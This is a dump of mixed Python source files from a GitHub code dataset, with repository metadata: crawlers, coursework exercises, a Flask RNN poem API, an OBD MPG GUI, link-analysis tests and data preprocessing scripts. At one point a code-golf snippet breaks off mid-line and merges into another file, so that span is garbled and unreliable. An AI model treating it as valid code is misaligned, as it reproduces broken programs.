scroll_bottom(self, selectorParent=None, selectorDom=None, limit_page=0):\n try:\n if selectorParent is None or selectorDom is None:\n return False\n\n is_success = True\n limit = 1\n\n # Get scroll height\n last_height = self.driver.execute_script(\"return \"+selectorDom+\".scrollHeight\")\n\n while True:\n try:\n if limit_page > 0:\n if limit > limit_page:\n break;\n\n # Scroll down to bottom\n self.driver.execute_script(selectorParent+\".scrollTo(0, \"+selectorDom+\".scrollHeight);\")\n\n # Wait to load page\n sleep(1)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = self.driver.execute_script(\"return \"+selectorDom+\".scrollHeight\")\n limit = limit + 1\n if limit % 10 == 0:\n log.logger.info('scroll bottom %d steps.' % (limit))\n if new_height == last_height:\n break\n last_height = new_height\n except Exception as e:\n is_success = False\n log.logger.error(e, exc_info=True)\n break\n\n return is_success\n\n # log.logger.info('last_height: %d' % (last_height))\n except Exception as e:\n log.logger.error(e, exc_info=True)\n return False\n\nif __name__ == \"__main__\":\n cgv = Instagram()\n cgv.utf_8_reload()\n cgv.start()\n","repo_name":"ko9ma7/crawler-1","sub_path":"instagram.py","file_name":"instagram.py","file_ext":"py","file_size_in_byte":29791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13209109091","text":"#Start\nprint (\"Amount Due: 50\")\ncoin = int(input (\"Insert Coin: \"))\n\ncost = 50 - coin\n\nwhile cost > 0:\n if coin == 25 or coin == 10 or coin == 5:\n print (\"Amount Due: \", cost)\n coin = input (\"Insert Coin: \")\n coin = int(coin)\n cost = cost - coin\n else:\n print (\"Amount Due: 50\")\n coin = input (\"Insert Coin: \")\n coin = int(coin)\n\nif cost==0:\n print (\"Change owed: 0\")\nelse:\n cost = (-1)*cost\n print(\"Change owed:\", cost)","repo_name":"joel-quek/Harvard-CS50P","sub_path":"Week 2 - Loops/coke/coke.py","file_name":"coke.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26167048908","text":"import re\nf=lambda s:''.join(map(g,re.split(r'([.?!])',s)))\ndef g(s):\n s=s.lower();r=''\n while s:\n c,*s=s;C=c.upper()\n if C= 0 and metal < 0.2:\n metal_lo = 0\n metal_hi = 0.2\n elif metal >= 0.2 and metal <= 0.5:\n metal_lo = 0.2\n metal_hi = 0.5\n\n if temp%250 != 0 and temp != 50000:\n temp_lo = math.floor(4 / 1000 * temp) / 4 * 1000\n temp_hi = math.ceil(4 / 1000 * temp) / 4 * 1000\n elif temp%250 == 0 and temp != 50000:\n temp_lo = temp\n temp_hi = temp+250\n elif temp == 50000:\n temp_lo = 47500\n temp_hi = 50000\n\n if interp == \" Linear \":\n interp_par = \"linear\"\n elif interp == \"Nearest neighbour\":\n interp_par = \"nearest\"\n\n return grav_lo,grav_hi,temp_lo,temp_hi,metal_lo,metal_hi,interp_par\n\n","repo_name":"cam92473/model_flux","sub_path":"calculations/vertices.py","file_name":"vertices.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44038983888","text":"# Read a line of input and parse into a list of strings\nstringList = input().split(' ')\nanagrams = dict()\n\n\ndef sort_string(word):\n letters_of_the_word = []\n final_string = ''\n for letter in word:\n letters_of_the_word.append(letter)\n letters_of_the_word.sort()\n for sorted_letter in letters_of_the_word:\n final_string += str(sorted_letter)\n return final_string\n\n\nfor element in stringList:\n anagrams[sort_string(str(element))] = []\nfor element in stringList:\n if sort_string(str(element)) in anagrams.keys():\n anagrams[sort_string(str(element))].append(element)\n\n\nkeys = list(anagrams.keys())\nkeys.sort()\nfor key in keys:\n print(key + ': ' + str(anagrams[key]))","repo_name":"danisaurio/C950-Complementary-excercises","sub_path":"Write code that incorporates the use of dictionaries/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4361871252","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nimport gc\nfrom tqdm import tqdm\nimport time\nfrom contextlib import contextmanager\nfrom sklearn.preprocessing import StandardScaler\n\n\n@contextmanager\ndef timer(name):\n t0 = time.time()\n yield\n print(f'[{name}] done in {time.time() - t0:.0f} s')\n\ndef preprocess(data: pd.DataFrame):\n \"\"\" 对数据进行预处理\n \"\"\"\n\n def fill_outliers(col: pd.Series):\n \"\"\" Remove outliers of each col\n \"\"\"\n mean = col.mean()\n std = col.std()\n upper = mean + 3 * std\n lower = mean - 3 * std\n col[col > upper] = np.floor(upper)\n col[col < lower] = np.floor(lower)\n return col.values\n\n # 处理离散值 & 填充空值(使用均值填充)\n columns = data.columns\n for col_name in tqdm(columns):\n data[col_name] = data[col_name].fillna(data[col_name].mean())\n #标准化 \n return data\n\nwith timer(\"split train and test dataset!!!\"):\n # 读取训练集和测试集\n X_train = pd.read_csv('./dataset/atec_anti_fraud_train.csv', encoding='utf-8',\n low_memory=False, parse_dates=['date'],index_col='id')\n X_test = pd.read_csv('./dataset/atec_anti_fraud_test_b.csv', encoding='utf-8',\n low_memory=False, parse_dates=['date'],index_col='id')\n col_train_num, col_test_num = X_train.columns, X_test.columns\n X_train, X_test = X_train[col_train_num], X_test[col_test_num]\n X_train_label,X_train_date=X_train.pop('label'),X_train.pop('date')\n X_test_date=X_test.pop('date')\n print(X_train.shape, X_test.shape)\n print(\"Start filter features!!!\")\n # 筛选缺失率小于0.6的特征\n col_train, col_test = [], []\n for item in X_train.columns:\n tmp = np.sum(X_train[item].isnull()) / len(X_train)\n if tmp < 1:\n col_train.append(item)\n for item in X_test.columns:\n tmp = np.sum(X_test[item].isnull()) / len(X_test)\n if tmp <1:\n col_test.append(item)\n # 选择训练集和测试集的交集\n col = [item for item in col_train if item in col_test]\n print('len(col):', len(col))\n X_train, X_test = X_train[col], X_test[col]\n X_train, X_test = preprocess(X_train), preprocess(X_test)\n X_train, X_test = pd.DataFrame(X_train),pd.DataFrame(X_test)\n \n X_train=pd.concat([X_train_label,X_train_date,X_train],axis=1)\n X_test=pd.concat([X_test_date,X_test],axis=1)\n\n X_train_col,X_test_col=col.copy(),col.copy() \n X_train_col.insert(0,'label')\n X_train_col.insert(1,'date')\n X_test_col.insert(0,'date')\n\n print(X_train.shape, X_test.shape)\n print(\"Start writing\")\n X_train.to_csv(\"./dataset/x_train.csv\", encoding='utf-8',header=X_train_col)\n X_test.to_csv(\"./dataset/x_test_b.csv\", encoding='utf-8',header=X_test_col)\n del X_train,X_test\n gc.collect()\n\n","repo_name":"haitwang-cloud/atec_anti_fraud","sub_path":"dataFilter.py","file_name":"dataFilter.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"72956585449","text":"import pygame\n\nfrom pygsear import Game, Drawable, Path\n\n\nclass Wing(Drawable.RotatedImage):\n def __init__(self):\n Drawable.RotatedImage.__init__(self, filename='arrow/right.png', steps=36)\n p = Path.RandomAccelerationPathBounded(minSpeed=2)\n self.set_path(p)\n self.center()\n\n self.stretch(dx=50, keepAspectRatio=0)\n\n def move(self):\n self.set_rotation(self.path.get_direction())\n Drawable.RotatedImage.move(self)\n\n\nclass AGame(Game.Game):\n def initialize(self):\n self.makeWings()\n\n def makeWings(self):\n for thing in range(5):\n i = Wing()\n self.sprites.add(i)\n\n\ng = AGame()\ng.mainloop()\n\n","repo_name":"davesteele/pygsear-debian","sub_path":"examples/wings.py","file_name":"wings.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69973416807","text":"# 对小说内容页进行解析\nimport requests\nimport bs4\n\n\ndef get_content(title, content_url):\n r = requests.get(content_url)\n bs = bs4.BeautifulSoup(r.text, 'html.parser')\n content = bs.select('.content')\n if len(content) > 0:\n list_p = content[0].find_all('p')\n for i in list_p:\n save_content(title, i.string)\n\n\ndef save_content(title, content):\n file = open(title, 'a+')\n file.write(content)\n","repo_name":"yzwgithub/TeachPython","sub_path":"height_class(18-22)/class_22/class_22_07.py","file_name":"class_22_07.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28511577692","text":"print(__doc__)\r\n#Authors : Zouhir Amrani && Youssef Snoussi\r\n#Contact : youssef.snoussi199@hotmail.com\r\n\r\n\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport time\r\n\r\n\r\ndef CAP(file):\r\n\t\r\n\t# Création d'un objet VideoCapture\r\n\tcap = cv2.VideoCapture(file)\r\n\r\n\t# Nous donnons un peu de temps à la caméra pour la configuration\r\n\ttime.sleep(3)\r\n\tcount = 0\r\n\t#background=0\r\n\r\n\t# Capture et stockage du cadre d'arrière-plan statique\r\n\tfor i in range(60):\r\n\t\tret,background = cap.read()\r\n\r\n\tbackground = np.flip(background,axis=1)\r\n\r\n\twhile(cap.isOpened()):\r\n\t\tret, img = cap.read()\r\n\t\tif not ret:\r\n\t\t\tbreak\r\n\t\tcount+=1\r\n\t\tprint(count)\r\n\t\timg = np.flip(img,axis=1)\r\n\t\r\n\t\t# Conversion de l'espace colorimétrique de BGR à HSV\r\n\t\thsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n\r\n\t\t# Génération de masque pour détecter la couleur\r\n\t\tlower_color = np.array([34,12,61])\r\n\t\tupper_color = np.array([97,87,255])\r\n\t\tmask1 = cv2.inRange(hsv,lower_color,upper_color)\r\n\r\n\t\tlower_color = np.array([255,255,255])\r\n\t\tupper_color = np.array([255,255,255])\r\n\t\tmask2 = cv2.inRange(hsv,lower_color,upper_color)\r\n\r\n\t\tmask3 = mask1+mask2\r\n\r\n\t\t# Affinage du masque correspondant à la couleur détectée\r\n\t\tmask1 = cv2.morphologyEx(mask3, cv2.MORPH_OPEN, np.ones((3,3),np.uint8),iterations=2)\r\n\t\tmask1 = cv2.dilate(mask3,np.ones((3,3),np.uint8),iterations = 1)\r\n\t\tmask2 = cv2.bitwise_not(mask3)\r\n\r\n\t\t# Générer le résultat final\r\n\t\tres1 = cv2.bitwise_and(background,background,mask=mask3)\r\n\t\tres2 = cv2.bitwise_and(img,img,mask=mask2)\r\n\t\tfinal_output = cv2.addWeighted(res1,1,res2,1,0)\r\n\t\t# affichage de resultat \r\n\t\tcv2.imshow('backGround',background)\r\n\t\tcv2.imshow('Cape Magic !!!',final_output)\r\n\t\tcv2.imshow('video orrigine',img)\r\n\t\t\r\n\r\n\t\tk = cv2.waitKey(1)\r\n\t\tif k == 27:\r\n\t\t\tbreak\r\n\tcap.release()\r\n\tcv2.destroyAllWindows()\r\n\r\n\r\n\r\n","repo_name":"youssef-sno/Color-based-object-tracking-with-python-and-opencv","sub_path":"cap.py","file_name":"cap.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30422704333","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport io\nimport json\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom flask_cors import CORS, cross_origin\nimport random\nimport numpy as np\nimport torch\nfrom flask import Flask, jsonify, request\n\nfrom textblob import TextBlob\ndef correct_word(word):\n if word==\"\\n\":\n return \"\\n\"\n elif word==\"mot\":\n return \"not\"\n elif word==\"mo\":\n return \"no\"\n elif word ==\"j\":\n return \"i\"\n else:\n return str(TextBlob(word).correct())\n\n# Class Definition\n\nclass Anastasia(nn.Module):\n\n def __init__(self, input_size, vocab_size):\n super(Anastasia, self).__init__()\n self.lstm = nn.LSTM(input_size, 256, batch_first=True)\n self.lstm2 = nn.LSTM(256, 512, batch_first=True)\n self.linear1 = nn.Linear(256, 512)\n self.dropout1 = nn.Dropout(0.4)\n self.linear2 = nn.Linear(512, 1024)\n self.linear3 = nn.Linear(1024, 1024)\n self.dropout2 = nn.Dropout(0.75)\n self.out = nn.Linear(1024, vocab_size)\n\n def forward(self, input):\n (output, _) = self.lstm(input)\n output = torch.tanh(output)\n output = self.linear1(output)\n output = F.leaky_relu(output)\n output = self.dropout1(output)\n output = self.linear2(output)\n output = F.relu(output)\n output = self.linear3(output)\n output = torch.tanh(output)\n output = self.dropout2(output)\n output = self.out(output)\n output = torch.reshape(output, (input.shape[0], vocab_len))\n return output\n\n\nchar_to_int = {\n '\\n': 0,\n ' ': 1,\n '!': 2,\n \"'\": 3,\n '(': 4,\n ')': 5,\n ',': 6,\n '-': 7,\n '.': 8,\n ':': 9,\n ';': 10,\n '?': 11,\n 'a': 12,\n 'b': 13,\n 'c': 14,\n 'd': 15,\n 'e': 16,\n 'f': 17,\n 'g': 18,\n 'h': 19,\n 'i': 20,\n 'j': 21,\n 'k': 22,\n 'l': 23,\n 'm': 24,\n 'n': 25,\n 'o': 26,\n 'p': 27,\n 'q': 28,\n 'r': 29,\n 's': 30,\n 't': 31,\n 'u': 32,\n 'v': 33,\n 'w': 34,\n 'x': 35,\n 'y': 36,\n 'z': 37,\n }\nint_to_char = {\n 0: '\\n',\n 1: ' ',\n 2: '!',\n 3: \"'\",\n 4: '(',\n 5: ')',\n 6: ',',\n 7: '-',\n 8: '.',\n 9: ':',\n 10: ';',\n 11: '?',\n 12: 'a',\n 13: 'b',\n 14: 'c',\n 15: 'd',\n 16: 'e',\n 17: 'f',\n 18: 'g',\n 19: 'h',\n 20: 'i',\n 21: 'j',\n 22: 'k',\n 23: 'l',\n 24: 'm',\n 25: 'n',\n 26: 'o',\n 27: 'p',\n 28: 'q',\n 29: 'r',\n 30: 's',\n 31: 't',\n 32: 'u',\n 33: 'v',\n 34: 'w',\n 35: 'x',\n 36: 'y',\n 37: 'z',\n }\n\n\n# Predict Function Definition\n\ndef predict_input(\n model,\n vocab_len,\n newcount=14,\n value='',\n ):\n val = value[:50]\n pattern = [char_to_int[i] for i in val]\n n_val = char_to_int['\\n']\n word_out = ''\n count_nl = pattern.count(n_val)\n i = 0\n while count_nl != newcount:\n x = np.reshape(pattern[-50:], (1, 1, 50))\n x = x / float(vocab_len)\n x = torch.tensor(x)\n prediction = F.softmax(model(x))\n index = torch.argmax(prediction).item()\n prediction = np.reshape(prediction.detach().numpy(), vocab_len)\n if int_to_char[index] == '\\n' and char_to_int['\\n'] \\\n in pattern[-40:]:\n while int_to_char[index] == '\\n':\n index = np.random.choice(vocab_len, 1, p=prediction)[0]\n if (pattern[-1] == char_to_int[' '] or pattern[-1]\n == char_to_int['\\n'] or pattern[-1] == char_to_int['t']) \\\n and random.random() < 0.25 or int_to_char[index] == '-':\n index = np.random.choice(vocab_len, 1, p=prediction)[0]\n while int_to_char[index] == '\\n' or int_to_char[index] \\\n == ' ' or int_to_char[index] == '-':\n index = np.random.choice(vocab_len, 1, p=prediction)[0]\n result = int_to_char[index]\n if result == ' ' and char_to_int['\\n'] \\\n not in pattern[-40:len(pattern)]:\n result = '\\n'\n index = char_to_int['\\n']\n if result == '\\n':\n count_nl += 1\n seq_in = [int_to_char[value] for value in pattern]\n pattern.append(index)\n word_out += result\n word_out = word_out.replace('\\n', ' \\n ')\n wordslist = word_out.split()\n if len(wordslist) > 2:\n if wordslist[-1] == wordslist[-2] or len(wordslist[-1]) > 9:\n lastword = wordslist.pop(-1)\n word_out = word_out[:-len(lastword)]\n pattern = pattern[:-len(lastword)].copy()\n i -= len(lastword)\n i += 1\n out = [int_to_char[i].replace('\\n', ' \\n ') for i in pattern]\n out = ''.join(out)\n out = [correct_word(i) for i in out.split(' ')]\n out = ' '.join(out).replace('\\n ', '\\n')\n return out\n\n\napp = Flask(__name__)\ncors = CORS(app)\nfilepath_load = 'ana_weight.pth'\nseq_length = 50\nvocab_len = len(char_to_int.keys())\nmodel = Anastasia(seq_length, vocab_len).double()\nmodel.load_state_dict(torch.load(filepath_load))\n\n\n@app.route('/predict', methods=['POST'])\n@cross_origin()\ndef predict():\n if request.method == 'POST':\n content = request.get_json()\n app.logger.info(content)\n inp = str(content.get('sonnet')).lower()\n linecount = int(content.get('numLines'))\n output = predict_input(model, vocab_len, linecount, inp)\n return jsonify({'output': output})\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Aakash-Ez/Anastasia-Poem-RNN","sub_path":"Anastasia-Flask-API/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19391606135","text":"from typing import List\nfrom pytest import approx\n\n\ndef drawdown(values: List[float]) -> float:\n \"\"\" Calculates the maximum drawdown of a series of values\"\"\"\n max_dd = 0\n for i, v in enumerate(values):\n peak = max(values[:i+1])\n dd = v/peak - 1\n if dd <= max_dd:\n max_dd = dd\n\n return max_dd\n\n\ndef test_drawdown():\n values = [100, 105, 110, 115, 110, 105, 110, 120, 140, 135]\n dd = drawdown(values)\n assert dd == approx(105/115 - 1)\n\n\nif __name__ == '__main__':\n test_drawdown()","repo_name":"kristjorge/shinywaffle","sub_path":"shinywaffle/common/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40356290497","text":"import keras\nfrom nltk import word_tokenize\nimport numpy as np\nimport pickle\nfrom keras.preprocessing.sequence import pad_sequences\n\ntokenizer = pickle.load(open('tokenizer.pickle','rb'))\nmaxlen = 50\n\ndef load_model():\n model = keras.models.load_model(\"emoji_model.h5\")\n pickle_in = open(\"word2index.pickle\",\"rb\")\n word2idx = pickle.load(pickle_in)\n return model , word2idx\n\ndef textpreprocessing(text,word2idx):\n text = word_tokenize(text.lower())\n test_sent = tokenizer.texts_to_sequences([text])\n test_sent = pad_sequences(test_sent, maxlen = maxlen)\n \n return test_sent\n\ndef predict_emoji(X , model):\n res = model.predict(X)\n res = np.argmax(res) \n return int(res)\n \ndef get_html_emoji(result):\n #return html code of emoji\n emoji2code = {\n 0 : \"😃\",\n 1 : \"😨\",\n 2 : \"😠\",\n 3 : \"😞\",\n 4 : \"🤢\",\n 5 : \"😬\",\n 6 : \"😣\"\n }\n\n return emoji2code[result] \n\ndef update_model(x , actual , model):\n new_test = np.vstack([x]*5)\n actual_output = np.zeros((1,7))\n actual_output[0,actual] = 1\n actual_output = np.vstack([actual_output]*5)\n model.compile(loss='categorical_crossentropy' , optimizer = 'adam' , metrics = ['acc'])\n model.fit(new_test , actual_output , epochs = 10 , batch_size = 32 , shuffle = True)\n model.save('emoji_model.h5')\n return model\n\ndef get_emoji_num(emoji):\n emoji2num = {\n \"happy\" : 0,\n \"fear\" : 1,\n \"anger\" : 2,\n \"sadness\" : 3,\n \"disgust\" : 4,\n \"shame\" : 5,\n \"guilt\" : 6\n }\n return emoji2num[emoji]","repo_name":"Shubby98/Emojify","sub_path":"text2emoji.py","file_name":"text2emoji.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27922507984","text":"\"\"\"Functions for unzipping zip archives.\"\"\"\n\nimport argparse\nimport zipfile\n\n\ndef unzip(filename):\n \"\"\"Generator that yields files in the given zip archive.\"\"\"\n with zipfile.ZipFile(filename, 'r') as archive:\n for zipinfo in archive.infolist():\n yield archive.open(zipinfo, 'r'), {\n 'name': zipinfo.filename,\n }\n\n\ndef main(filenames):\n for filename in filenames:\n for srcfile, metadata in unzip(filename):\n with open(metadata['name'], 'w') as f:\n f.write(srcfile.read())\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=__doc__)\n parser.add_argument('zip_files', nargs='+')\n\n args = parser.parse_args()\n main(args.zip_files)\n","repo_name":"GoogleCloudPlatform/community","sub_path":"archived/data-science-extraction/unzip.py","file_name":"unzip.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1892,"dataset":"github-code","pt":"53"} +{"seq_id":"12511349993","text":"import sys\nimport obd\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\nclass OBDGui(QWidget):\n def __init__(self, parent = None):\n super(OBDGui, self).__init__(parent)\n\n # Set window geometry\n self.title = 'OBD GUI'\n self.left = 10\n self.top = 10\n self.width = 450\n self.height = 200\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n layout = QVBoxLayout()\n\n # MPG Slider\n self.s = QProgressBar()\n self.s.setRange(0,50)\n self.s.setValue(0)\n self.s.setTextVisible(False)\n self.s.setAlignment(Qt.AlignRight)\n layout.addWidget(self.s)\n\n # MPG Value Text\n self.l = QLabel(\"0.0 MPGs\")\n self.l.setFont(QFont('Fira Sans Semi-Light', 16))\n self.l.setAlignment(Qt.AlignCenter)\n layout.addWidget(self.l)\n\n # Update timer\n print(\"Connecting to OBD Reciever\")\n self.connection = obd.Async()\n print(\"Connection successful. Starting command watch loop...\")\n self.connection.watch(obd.commands.SPEED)\n self.connection.watch(obd.commands.RPM)\n self.connection.watch(obd.commands.INTAKE_PRESSURE)\n self.connection.watch(obd.commands.INTAKE_TEMP)\n self.connection.start()\n self.timer = QTimer()\n self.timer.timeout.connect(self.getmpg)\n self.timer.start(500)\n\n # Open the CSV Log File\n self.mf = open(\"mpg.csv\", \"w+\")\n self.mf.write(\"MPG,RPM,SPEED,IMAP,TMP,MAP\\n\")\n\n # Arrange all widets\n self.setLayout(layout)\n\n\n def getmpg(self):\n SPEED = self.connection.query(obd.commands.SPEED).value.magnitude\n # MAF Calculation\n RPM = self.connection.query(obd.commands.RPM).value.magnitude\n MAP = self.connection.query(obd.commands.INTAKE_PRESSURE).value.magnitude\n TMP = self.connection.query(obd.commands.INTAKE_TEMP).value.magnitude+273.15\n R = 8.314 # Specific gas constant\n MM = 28.97 # Molecular mass of air\n DISP = 3.964 # Engine displacement in L\n VE = 0.75 # Volumetric efficency, play around with this value\n IMAP = (RPM*MAP)/TMP\n MAF = (IMAP/120)*VE*DISP*(MM/R)\n MPG = (710.7*SPEED)/(MAF*100)\n self.mf.write(\"{},{},{},{},{},{}\\n\".format(MPG,RPM,SPEED,IMAP,TMP,MAP))\n self.l.setText(str(MPG)+\" MPGs\")\ndef main():\n app = QApplication(sys.argv)\n ex = OBDGui()\n ex.show()\n sys.exit(app.exec_())\n \n\t\nif __name__ == '__main__':\n main()","repo_name":"Pixadus/PiDashboard","sub_path":".archive/mpg-gui-text.py","file_name":"mpg-gui-text.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3285293008","text":"import os\nimport shutil\nfrom uuid import uuid4\n\nimport flask\nimport selenium\nfrom selenium.common.exceptions import InvalidArgumentException\n\nfrom backend.endpoints.link import get_downloaded_filenames, get_iframe_urls, teardown_downloads, get_urls, get_metrics, setup, link\nimport backend\n\n\nclass TestLink:\n def test_teardown_downloads_directory_exists(self, mocker):\n temp_download_directory = mocker.MagicMock()\n mocker.patch('shutil.rmtree')\n mocker.patch('os.path.isdir', return_value=True)\n\n teardown_downloads(directory=temp_download_directory)\n\n shutil.rmtree.assert_called_once()\n\n def test_teardown_downloads_directory_does_not_exist(self, mocker):\n temp_download_directory = mocker.MagicMock()\n mocker.patch('backend.endpoints.link.logger.info')\n mocker.patch('shutil.rmtree')\n mocker.patch('os.path.isdir', return_value=False)\n\n teardown_downloads(directory=temp_download_directory)\n\n shutil.rmtree.assert_not_called()\n backend.endpoints.link.logger.info.assert_called_once()\n\n def test_get_downloaded_filenames_directory_exists(self, mocker):\n download_filenames = [\"one\", \"two\", \"three\"]\n temp_download_directory = mocker.MagicMock()\n mocker.patch('os.listdir', return_value=download_filenames)\n mocker.patch('os.path.isdir', return_value=True)\n \n result = get_downloaded_filenames(directory=temp_download_directory)\n \n assert result == download_filenames\n\n def test_get_downloaded_filenames_directory_does_not_exist(self, mocker):\n temp_download_directory = mocker.MagicMock()\n mocker.patch('backend.endpoints.link.logger.info')\n mocker.patch('os.listdir')\n mocker.patch('os.path.isdir', return_value=False)\n \n result = get_downloaded_filenames(directory=temp_download_directory)\n \n os.listdir.assert_not_called()\n backend.endpoints.link.logger.info.assert_called_once()\n assert result == []\n\n def test_get_iframe_urls(self, mocker):\n mock_iframe_url = \"mock_iframe_url\"\n mock_iframe = mocker.MagicMock()\n mock_iframe.get_property.return_value = mock_iframe_url\n iframe_urls = [mock_iframe]\n mock_driver = mocker.patch(\"selenium.webdriver.Chrome\")\n mock_driver.find_elements_by_tag_name.return_value = iframe_urls\n\n result = get_iframe_urls(driver=mock_driver)\n\n assert result == [mock_iframe_url]\n \n def test_get_urls(self, mocker):\n mock_url = \"mock_url\"\n mock_redirect_url = \"mock_redirect_url\"\n mock_current_url = \"mock_current_url\"\n mock_url_response = mocker.MagicMock()\n mock_url_response.url = mock_url\n mock_redirect_response = mocker.MagicMock()\n mock_redirect_response.url = mock_redirect_url\n mock_history = mocker.MagicMock()\n mock_history.history = [mock_url_response, mock_redirect_response]\n mocker.patch(\"requests.get\", return_value=mock_history)\n \n mock_driver = mocker.patch(\"selenium.webdriver.Chrome\")\n mock_driver.current_url = mock_current_url\n \n landing_result, redirect_result = get_urls(driver=mock_driver, url=mock_url)\n\n assert landing_result == [mock_current_url]\n assert redirect_result == [mock_url, mock_redirect_url, mock_current_url]\n\n def test_get_metrics(self, mocker):\n urls = ([\"url0\", \"url1\"], [\"url2\"])\n iframe_urls = [\"iframe_url0\", \"iframe_url1\"]\n download_filenames = [\"filename0\", \"filename1\"]\n mocker.patch(\"backend.endpoints.link.get_urls\", return_value=urls)\n mocker.patch(\"backend.endpoints.link.get_iframe_urls\", return_value=iframe_urls)\n mocker.patch(\"backend.endpoints.link.get_downloaded_filenames\", return_value=download_filenames)\n\n driver = mocker.MagicMock()\n url = mocker.MagicMock()\n temp_download_directory = mocker.MagicMock()\n landing_url, redirect_urls, iframe_urls, download_filenames = get_metrics(driver=driver, url=url, temp_download_directory=temp_download_directory)\n\n assert ((landing_url, redirect_urls), iframe_urls, download_filenames) == (urls, iframe_urls, download_filenames)\n\n def test_setup(self, mocker):\n mock_driver = mocker.MagicMock()\n mocker.patch(\"selenium.webdriver.ChromeOptions\")\n mocker.patch(\"os.mkdir\")\n mocker.patch(\"selenium.webdriver.Chrome\", return_value=mock_driver)\n\n with backend.app.app.app_context():\n driver, temp_download_directory = setup()\n\n assert driver == mock_driver\n assert isinstance(temp_download_directory, str)\n","repo_name":"alexd-conf/link_analysis","sub_path":"backend/tests/unit_tests/test_link_endpoint.py","file_name":"test_link_endpoint.py","file_ext":"py","file_size_in_byte":4692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4930841262","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 17 20:45:37 2018\r\n\r\n@author: Gaurav Rai\r\n\"\"\"\r\n\r\n# Set working directory\r\n#path = input(\"Input file path directory: \")\r\nimport os\r\n#os.chdir(path)\r\nos.chdir('D:\\Analytics_Vidhya_Research\\AM_Expert_2018 Competition')\r\nos.getcwd()\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n#%matplotlib inline\r\nplt.style.use('bmh')\r\n\r\n# Reading complete dataset\r\ndataset = pd.read_csv('train.csv',sep = ',',low_memory=False)\r\n\r\n\r\n\r\n####################################################\r\n## Feature Engineering Step - From Historical Logs\r\n####################################################\r\n# Reading complete dataset\r\ndataset_feature = pd.read_csv('historical_user_logs.csv',sep = ',',low_memory=False)\r\ndataset_feature.dtypes\r\n\r\n# Feature Engineering Steps on historical data\r\n# Taking out values view and interest values group by user_id, product and action \r\n# These added features will be merged with train data set provided for analysis\r\ndf_feat_grp = dataset_feature.groupby(['user_id','product','action'])['action'].agg('count') ## ???? how to provide header for count \r\n\r\ndf_feat1 = pd.DataFrame({'cols':df_feat_grp.index, 'count_action':df_feat_grp.values})\r\n\r\ndf_feat1[['user_id','product','action']] = df_feat1['cols'].apply(pd.Series) \r\n\r\ndf_feat1.drop(['cols'], axis=1, inplace=True)\r\n\r\ndf_feat2 = df_feat1.groupby(['user_id','action'])['count_action'].agg('sum')\r\n\r\ndf_feat3 = pd.DataFrame({'cols':df_feat2.index, 'count_action':df_feat2.values})\r\n\r\ndf_feat3[['user_id','action']] = df_feat3['cols'].apply(pd.Series) \r\n\r\ndf_feat3.drop('cols', axis=1, inplace=True)\r\n\r\ndataset_full1 = pd.merge(dataset, df_feat3, how='left', left_on=['user_id'], right_on = ['user_id'])\r\n\r\n# Check the data types of the columns\r\ndata_dtypes = dataset_full1.dtypes\r\n\r\nfrom sklearn.model_selection import train_test_split\r\ndataset_train ,dataset_test = train_test_split(dataset_full1,test_size=0.2)\r\ndataset_train['source'] = 'Train'\r\ndataset_test['source'] = 'Test'\r\n\r\n\r\n# Combining the dataset again for further computations\r\ndataset_full = pd.concat([dataset_train,dataset_test], axis = 0)\r\n\r\n########################\r\n# Missing value imputation (NAs)\r\n########################\r\n\r\n# First check for NAs\r\n# returns the sum of NA values column wise\r\nb = dataset_full.isnull().sum() \r\n\r\n# For Continuous vars: Impute with median\r\n# For Categorical vars: Impute with mode\r\n\r\nfor column in dataset_full:\r\n if( (dataset_full[column].dtype == 'object') & (b[column] > 0)):\r\n dataset_full[column].fillna(dataset_train[column].mode()[0], inplace = True)\r\n elif ((dataset_full[column].dtype != 'object') & (b[column] > 0)):\r\n 